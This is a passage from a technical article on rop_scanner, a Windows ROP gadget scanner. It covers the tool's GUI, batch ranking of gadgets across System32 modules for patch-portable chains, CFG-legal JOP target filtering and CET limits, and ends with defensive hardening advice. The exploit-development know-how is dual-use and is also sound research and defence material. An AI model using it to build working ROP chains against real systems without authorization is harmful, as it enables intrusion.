The binary auto-detects. The GUI looks for rop_scanner next to itself, in ../bin, in ../../build/bin, and in a macOS .app bundle’s Resources/. If you keep the standard CMake layout, you never edit the path.
Streaming output console. Stdout in white, stderr in amber, live as the scanner runs. Long batch scans no longer block in silence.
Copy cmdline. A button that assembles the exact shell command equivalent to the current form state and copies it to the clipboard. Useful for exploit-dev notes and for handing a repro to a teammate who only has the CLI.
Save output. Writes .txt, .json or .py depending on --format. The .py file is the pwntools dictionary — same as the CLI --format pwntools output, ready to paste.
QSettings persistence. Every field is saved between launches per OS conventions (registry on Windows, plist on macOS, ~/.config on Linux). The second time you open the GUI it remembers the last target, filter, and badbytes.
Clean cancellation. Cancel force-kills the running scanner subprocess (SIGKILL on Linux and macOS; Windows has no signals, so there it is a hard process termination), so you cannot leave a wedged batch scan behind.
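The «Copy cmdline» idea, turning form state back into an argv list and then into a quoted shell string, can be sketched in Python. The GUI itself is C++/Qt, so this only mirrors the concept; the form-state keys are hypothetical, the flag names are the ones listed above, and the recursive checkbox is left out because its CLI flag is not named here. shlex.join produces POSIX-shell quoting.

```python
import shlex

# (form-state key, CLI flag) for value-carrying fields, in the article's usual order.
VALUE_FLAGS = [("filter", "--filter"), ("badbytes", "--badbytes"),
               ("min_score", "--min-score"), ("limit", "--limit"),
               ("max_bytes", "--max-bytes"), ("max_insn", "--max-insn"),
               ("format", "--format")]

def build_argv(state, binary="./rop_scanner"):
    """Turn a hypothetical form-state dict into an argv list."""
    argv = [binary]
    argv += ["--dir", state["target"]] if state.get("dir_mode") else [state["target"]]
    for key, flag in VALUE_FLAGS:
        if state.get(key) not in (None, ""):
            argv += [flag, str(state[key])]
    cfg = state.get("cfg")                      # None, "only" or "exclude"
    if cfg == "only":
        argv.append("--only-cfg")
    elif cfg == "exclude":
        argv.append("--exclude-cfg")
    if state.get("no_symbols"):
        argv.append("--no-symbols")
    return argv

form = {"target": "ntdll.dll", "filter": "pop rcx ; ret",
        "badbytes": "00,0a,0d", "format": "pwntools"}
print(shlex.join(build_argv(form)))
# ./rop_scanner ntdll.dll --filter 'pop rcx ; ret' --badbytes 00,0a,0d --format pwntools
```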

The code is a thin shell over the CLI — three files in gui/src/: MainWindow.cpp (form widgets and signal/slot wiring), ScannerRunner.cpp (a small QProcess wrapper that streams stdout and stderr to the console), and main.cpp (entry point). It links against Qt6::Widgets, or Qt5::Widgets if Qt6 is not present.

Building the GUI

The GUI is an opt-in second target on the existing CMake build. The platform build scripts already handle it — you just set GUI=1 and re-run.

macOS

brew install qt           # one-time
GUI=1 ./mac_build.sh
open build/bin/rop_scanner_gui.app

Linux (Debian / Ubuntu)

sudo apt install qt6-base-dev libvulkan-dev
GUI=1 ./linux_build.sh
./build/bin/rop_scanner_gui

On Fedora / RHEL replace qt6-base-dev libvulkan-dev with qt6-qtbase-devel vulkan-headers.

Windows

Install Qt6 via the official installer at qt.io/download-open-source, or vcpkg install qt6-base, or MSYS2 pacman -S mingw-w64-x86_64-qt6-base. Then point CMake at the install root and build the gui target:

set QT_PREFIX=C:\Qt\6.6.0\msvc2019_64
windows_build.bat build gui
build\bin\rop_scanner_gui.exe

The GUI does not replace the CLI for anything; it is the same scanner with a more discoverable surface. Tab-completion in your shell is still faster once you know the flags, but for hopping between targets and tweaking --min-score live, the form layout is genuinely easier than rebuilding the command in your head every time.

Going further: cross-module hunts

Figure: batch mode scans every PE in System32, dedups by asm, and ranks by module count and score. Gadgets that show up in many modules survive Windows updates and target-host variation; the ones at the top of this list are the foundation of a portable chain.

The chain above is correct on the exact ntdll.dll build we scanned. If the victim is on a different patch level the RVAs move and the chain breaks. The robust answer is to find gadgets that are present in every Windows install. rop_scanner does this in batch mode:

$ ./rop_scanner --dir "C:\Windows\System32" \
    --filter "pop rcx ; ret" \
    --badbytes 00,0a,0d \
    --no-symbols \
    --min-score 80 \
    --limit 25

The output is the same gadgets, ranked by how many modules they appear in. The top entries are the «ubiquitous» ones: pop rcx ; ret sequences that show up in ntdll.dll, kernelbase.dll, combase.dll, oleaut32.dll, and many more, because the byte sequence falls out of code patterns (such as register save and restore sequences) that the compiler emits everywhere. Their RVAs still move between builds, but a chain built from them can be re-sourced on a 22H2, 23H2, 24H2, or 25H2 image just by rerunning the scan, instead of being redesigned around whatever that build happens to contain.
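The aggregation behind batch mode amounts to grouping gadget records by asm text and counting distinct modules. A minimal sketch, assuming each record is a (module, asm, score) tuple gathered from per-module scans; ordering by module count first and best score second follows the batch-mode figure caption, while the record shape and the final alphabetical tie-break are our assumptions.

```python
from collections import defaultdict

def rank_across_modules(records):
    """records: iterable of (module, asm, score) from per-module scans."""
    modules = defaultdict(set)
    best = {}
    for module, asm, score in records:
        modules[asm].add(module.lower())          # dedup by asm; module names case-insensitive
        best[asm] = max(best.get(asm, 0), score)
    rows = [(asm, len(mods), best[asm], sorted(mods)) for asm, mods in modules.items()]
    rows.sort(key=lambda r: (-r[1], -r[2], r[0]))  # module count, then score, then asm
    return rows

records = [("ntdll.dll", "pop rcx ; ret", 85), ("KernelBase.dll", "pop rcx ; ret", 85),
           ("combase.dll", "pop rcx ; ret", 80), ("ntdll.dll", "pop rdx ; pop r8 ; ret", 80),
           ("ntdll.dll", "pop rcx ; ret", 85)]
for asm, count, score, mods in rank_across_modules(records):
    print(f"{count:3} modules  score={score:3}  {asm}  ({', '.join(mods)})")
```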

CFG-aware chains on modern Windows

If the vulnerability gives us indirect-call control instead of stack-return control (a vtable corruption, a callback hijack, a member-function pointer overwrite), we land in CFG's domain. CFG-instrumented code checks the target of every indirect call against a bitmap the loader builds from each module's GuardCFFunctionTable, and rejects anything not marked valid. Plain ret is not subject to CFG, so the simplest answer remains: pivot through ret. But if you really need a JOP-style chain (jmp reg, call reg), rop_scanner can show you only the CFG-legal targets:

$ ./rop_scanner ntdll.dll --only-cfg --filter "jmp r" --limit 20

or, conversely, only the CFG-illegal ones, so you can audit which gadget starts are off the table as indirect-call targets:

$ ./rop_scanner ntdll.dll --exclude-cfg --filter "jmp r" --limit 20
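Whether a gadget start is CFG-valid comes down to a lookup in the module's GuardCFFunctionTable. A minimal sketch, assuming you already have the raw table bytes, the entry count (GuardCFFunctionCount) and GuardFlags from IMAGE_LOAD_CONFIG_DIRECTORY64. Each entry is a 4-byte RVA followed by a number of metadata bytes encoded in the top nibble of GuardFlags, and the linker emits the table in ascending RVA order (we rely on that for the binary search). The exact-match check is a simplification of the runtime bitmap, which works at 16-byte granularity; the table below is synthetic.

```python
import bisect
import struct

# From winnt.h: the top nibble of GuardFlags holds the number of extra
# metadata bytes that follow each 4-byte RVA in GuardCFFunctionTable.
IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_MASK = 0xF0000000
IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_SHIFT = 28

def parse_guard_table(raw, count, guard_flags):
    extra = ((guard_flags & IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_MASK)
             >> IMAGE_GUARD_CF_FUNCTION_TABLE_SIZE_SHIFT)
    stride = 4 + extra
    return [struct.unpack_from("<I", raw, i * stride)[0] for i in range(count)]

def is_cfg_valid(rva, table):
    """Exact match against the sorted table of valid call-target RVAs."""
    i = bisect.bisect_left(table, rva)
    return i < len(table) and table[i] == rva

# Synthetic table: three targets, one metadata byte per entry (stride 5).
raw = b"".join(struct.pack("<IB", rva, 0) for rva in (0x1000, 0x2040, 0x3100))
table = parse_guard_table(raw, 3, guard_flags=0x10000000)
print([hex(r) for r in table], is_cfg_valid(0x2040, table), is_cfg_valid(0x2041, table))
```

Most mid-function gadget starts fail this check, which is why the --only-cfg list is so much shorter than the full catalog.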

CET Shadow Stack adds a further constraint: every ret must match the copy kept on the shadow stack, which breaks classic ret chains outright. On Windows, user-mode enforcement applies only to processes that opt in (for example binaries linked with /CETCOMPAT) on CPUs that support it. Syscall-terminated gadgets do not escape the check on their own, because reaching them still takes a ret.

Key Takeaways

ROP on Windows in 2026 still works, but the work has moved — from inventing technique to finding the gadgets fast enough that exploit dev is iterative. A scanner that hits the right module in < 1 s changes how you write chains.
Two filter axes — category (terminator) and semantic (body effect) — let you express the gadget you need in one substring. Plain --filter "write-mem" is the difference between five minutes and an afternoon.
Mid-instruction discovery is mandatory on Windows x64 because MSVC does not emit the clean argument-loader epilogue you want. The Zydis back-end is what makes this practical.
Bad-byte filtering belongs at gadget validation, not as a Python post-filter, because the eliminated candidates are exactly the ones that would otherwise dominate the score-sorted list.
Cross-module batch ranking is how chains survive Windows updates. If the gadget is in every default-loaded module, you can expect to find it again on the next patch level, even though its RVA will have to be re-resolved.
CFG and XFG do not kill ROP; they kill the lazy indirect-call variants. Wherever CET Shadow Stack is not enforced, pivoting through plain ret remains the boring, durable answer.

Defensive Recommendations

Turn on every mitigation MSVC offers: /GS, /guard:cf, /guard:ehcont, /CETCOMPAT, /DYNAMICBASE, /HIGHENTROPYVA, /SAFESEH (on 32-bit), /NXCOMPAT. None of them is individually a silver bullet, and none changes what a static scanner finds in the bytes; together they strip away the assumptions (fixed addresses, executable stacks, unchecked indirect calls and returns) that make a raw gadget list usable at runtime.
Enable Arbitrary Code Guard (ACG) and Code Integrity Guard (CIG) via SetProcessMitigationPolicy or the Windows Exploit Protection settings. ACG denies VirtualProtect requests that flip a page to executable in the first place, which is exactly the operation our example chain relies on.
Reduce the cross-module gadget pool with /Gw, /Gy and link-time code generation, and consider Microsoft’s POGO profile-guided optimization to compact hot paths.
Audit your indirect-call surface with rop_scanner --only-cfg --filter "jmp r" on your own binaries. The output is the list of legal JOP landings in your build. If any of them are unexpected, that is a finding.
Block the «ubiquitous» gadgets where you can: configure WDEG / EMET-style anti-ROP heuristics on caller stack inspection at VirtualProtect, VirtualAlloc, NtProtectVirtualMemory. They are noisy, but they catch the lazy chain.
Run a baseline batch scan of your clean image, store the result, and re-run weekly. Any drift in the gadget catalogue that does not correspond to a published Windows Update is signal — either a third-party module update with new bytes, or something interesting.
Compile with /sdl for new code. It is not free in performance, but it folds in the bounds-check intrinsics, banned API blockers, and additional runtime asserts that turn the strcpy in our demo into a compile-time error.
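The weekly drift check from the list above reduces to a set difference between two catalogs. A minimal sketch, assuming each batch scan has been parsed into records with hypothetical module, rva and asm keys (the real JSON output schema is not reproduced here), and using vendor.dll as a made-up third-party module.

```python
def catalog_keys(rows):
    """Identity of a gadget for drift purposes: module, RVA and asm text."""
    return {(r["module"].lower(), r["rva"], r["asm"]) for r in rows}

def diff_catalogs(baseline, current):
    old, new = catalog_keys(baseline), catalog_keys(current)
    return sorted(new - old), sorted(old - new)   # (appeared, disappeared)

baseline = [{"module": "ntdll.dll", "rva": 0xA8C13, "asm": "pop rcx ; ret"},
            {"module": "vendor.dll", "rva": 0x1200, "asm": "pop r9 ; ret"}]
current  = [{"module": "ntdll.dll", "rva": 0xA8C13, "asm": "pop rcx ; ret"},
            {"module": "vendor.dll", "rva": 0x1340, "asm": "pop r9 ; ret"}]
appeared, disappeared = diff_catalogs(baseline, current)
print("appeared:   ", appeared)
print("disappeared:", disappeared)
```

Changes in Microsoft modules should line up with Patch Tuesday; anything else in the two lists is worth a look.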

Conclusion

The point of rop_scanner is not that it discovers techniques nobody knew. The point is that it makes Windows ROP feel like a build step: scan, filter, export, paste into pwntools, ship. The example above — vulnerable C source, strcpy overflow, DEP-enabled target, full ROP chain into VirtualProtect, calc pops — runs end-to-end in under five minutes once the scanner is in your path. That speed is what lets you spend the time where it matters: on the bug, on the trigger, on the OPSEC of the payload — and not on rereading bytes in IDA looking for a pop r8 ; ret.

The source, the build scripts for Windows / Linux / macOS, the SVG diagrams above, and a worked example tree live at github.com/oxfemale/rop_scanner. Issues and pull requests welcome.

Credits

The original idea and the article that started this rabbit hole — «Hunting ROP Gadgets in Windows DLLs» by 0x12 Dark Development (@Salsa12__) on Medium. The decoder is Zydis by Florian Bernd and the zyantific team, pulled in automatically through CMake FetchContent. The C++17 implementation of the scanner, the CFG / .pdata parsing, the classification model, and the four output formats are this project’s own.

Intended use: analysis of binaries you either own or are explicitly authorized to research — your own software, training ranges, CTF, authorized engagements, defensive research, education. The author of this article and the author of the original idea disclaim responsibility for misuse.

core-jmp
